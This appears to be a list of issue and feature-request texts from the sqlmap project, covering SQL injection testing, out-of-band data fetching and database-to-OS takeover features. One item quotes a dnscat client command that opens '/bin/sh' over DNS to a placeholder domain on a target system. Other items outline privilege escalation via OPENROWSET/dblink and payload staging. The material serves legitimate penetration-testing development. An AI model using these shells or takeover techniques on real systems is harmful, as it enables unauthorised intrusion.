sqlmapproject / sqlmap
Automatic SQL injection and database takeover tool
Home Page: http://sqlmap.org
License: Other
Add support to test and exploit SQLi in any header of the request.
This requires some refactoring and a layer of abstraction when parsing params/values.
The newly added switches/options are not documented in the manual.
Examples: --hex, --host, --force-ssl, --titles, --check-tor, ....
But they are visible using the -h option, so it's no big deal ;)
This is related to issue #46.
References:
Design and implement a mechanism to identify a session expiry (e.g. 302 to /login page, no Set-Cookie issued, etc.) and automatically re-authenticate given the raw authentication request from the user.
Add support to generate a report, at least in XML/XSLT format.
PostgreSQL 9.0, 9.1 and 9.2 have been out for a while now. We need to compile UDFs for those versions too, both 32-bit and 64-bit on Linux and Windows.
We have a clean mechanism to handle custom DBMS-specific statements when they do not fit in xml/queries.xml; we should use it instead and remove all hard-coded custom statements from the source code.
Closely related to issue #33.
Possible enhancements to --crawl are:
We have already got OOB database server takeover via TCP (using Metasploit payloads: shell, Meterpreter, VNC), via ICMP (using icmpsh). It is time to implement out-of-band via DNS.
DNS tunneling as a Metasploit shellcode: http://www.skullsecurity.org/blog/?p=611.
Details about dnscat: http://www.skullsecurity.org/wiki/index.php/Dnscat.
Example of the string on the authoritative DNS server for tun.yourdomain.org:
sudo ./dnscat --listen
Example of the string on the client (target system):
./dnscat --domain tun.yourdomain.org --exec "/bin/sh"
Type commands on the authoritative DNS server for tun.yourdomain.org where you launched dnscat; they will be executed on the client (target system) and standard output shown inline.
Create a test environment (as in .SQL files to create tables with the relevant encoding + entries) for localized data like Russian, Portuguese and Chinese, and for binary data (like an image, to test safe2bin).
Identify linked/cluster DBMS servers when possible (e.g. MSSQL)
It would be great to give sqlmap a WSDL file or WSDL URL; it parses it and starts assessing each tag method for SQL injections. Example: http://demo.testfire.net/bank/ws.asmx?WSDL.
Support for SOAP parsing/injection has already been implemented, see http://bernardodamele.blogspot.com/2010/06/sqlmap-and-soap-based-web-services.html. Need to extend it to forge different "URLs" for each method of the parsed WSDL.
Rewrite --update to update sqlmap from GitHub ('git pull' and GitPython or another library)
Update function/class/method docstrings (where applicable)
Add support to search for a specific row in the table given its content snippet (LIKE '%value of -E%')
Add basic/advanced help mechanism
Add support to takeover the file system when the back-end DBMS is Oracle.
References:
Discuss and implement a solution for DBMS-specific detection/enumeration limitations:
Add support to automatically parse JSON data (e.g. {"prefixText":"abc","count":20}) and be able to test and exploit SQLi in each JSON param's value.
It would be great if you can disable the password cracking feature with another parameter when running in batch mode.
Sometimes you only want to extract the data and using the --batch switch is the only way to extract a big database in the background.
Adapt dbms modules/methods/xml queries file for usage with different versions of the dbms.
For instance, kb.dbmsVersion is already used within MSSQL to determine how to re-enable the xp_cmdshell procedure. This will also be useful for Firebird and in general replaces the ugly "query"/"query2" used in the queries.xml with some proper "minver"/"maxver" that specify which query apply to which dbms version.
To be worked on closely with ticket #24.
Recently we implemented DNS for data fetching. The objective is to implement more out-of-band techniques for data fetching:
Some relevant materials:
Maybe it would be good to use some SQL parser: http://pyparsing.wikispaces.com/
See:
Work on this alongside issue #44.
One directory (procs/) with usable PL/SQL, SQL and T-SQL scripts which can be injected when stacked queries are supported or with direct connection (-d).
Closely related to issue #51.
"Looks like sqlmap has an issue while using --random-agent with the -g argument, as it always returns "unable to find results for your Google dork expression" though it works fine without supplying --random-agent."
When stacked queries are supported, use OPENROWSET (MSSQL) and dblink() (PostgreSQL) to run a statement as a different user (e.g. a higher-privileged user, for instance after a password cracking attack).
The same library code can be used in ticket #31.
References:
--hpp
Adding full support for another DBMS is a pain in the ass 'cause around the whole code there's stuff like if kb.dbms == "MySQL" [...] elif kb.dbms in ( "Oracle" etc. It would be very intelligent to remove this DBMS-specific stuff from libs like lib/core/agent.py (grep for kb.dbms, you'll see) and have it all in plugins/dbms//language.py or similar, so the code would be much easier to maintain and, most important, far easier to add a new DBMS to.
Add support to takeover the file system when the back-end DBMS is IBM DB2
Add support to takeover the operating system when the back-end DBMS is IBM DB2
In both --file-upload and --os-pwn provide the user with the option to download onto the DBMS filesystem the payload stager (or shellcodeexec executable) via HTTP/TFTP/FTP server from the attacker (or a staged third-party server) machine rather than uploading it via SQL payload's file write methods.
Port the same concept eventually to --file-download too.
Libraries:
I think that this can be done taking advantage of the object that handles --forms (forms parsing) switch.
Create some test environment pages for injecting into PL/SQL code (Oracle) and T-SQL statements (MSSQL).
Quoting a user:
The problem is that the vulnerable list.php script limits the number of outputted items --- it always shows only the first 10 items, omitting the others at the PHP level (without using a MySQL LIMIT clause), so sqlmap incorrectly detects the number of columns, number of rows etc. --- always limiting the number of items to 10.
I looked in the documentation and didn't find any options for splitting enumeration requests into a bunch of requests limited by some value of outputted items (e.g. query all table rows selecting 10 rows per single query). Can you add such options or tell me how I can achieve my goal with the current version of sqlmap (I'm using the trunk version)?
Another suggestion:
Also I want to propose checking whether all of the requested items were received by adding an extra UNION SELECT at the end with some end mark and checking whether that end mark is received. I don't know the details of sqlmap's implementation, so I'm not sure if my proposition is correct.
Example:
Send your requests to /post.php but look at/fetch /index.php after you submitted to /post.php for detection/exploitation.
Check and eventually implement new/updated blind sql injection exploitation techniques:
There are observed cases where the last character of the output is trimmed:
[15:02:01] [INFO] testing MySQL
[15:02:03] [WARNING] reflective value(s) found and filtering out
[15:02:03] [WARNING] possible server trimmed output detected (due to its length): 1:ugd-->
[15:02:03] [WARNING] the back-end DBMS is not MySQL
[15:02:03] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
In the given case kb.chars.stop was :ugd: but in the output it appeared as :ugd because of last-character removal (in the web application logic). Detect this and patch it.
Both for attacker (after the DBMS fingerprint output) and for developer/DBA (at the end, just before the "shutting down" message).
Report also about known vulnerabilities based on DBMS exact version (consider backporting!) and known Metasploit exploits.
Now that Metasploit properly runs on Windows too (without Cygwin), we definitely need to support all functionalities on Windows too, if possible. Hence, the --os-pwn/--os-smbrelay/--os-smb code needs to be reviewed: metasploit.py, subprocessng.py and icmpsh*.py.
Enumerate binary field data, such as images, for instance.
Possible references:
Add support to takeover the operating system when the back-end DBMS is Oracle.
References: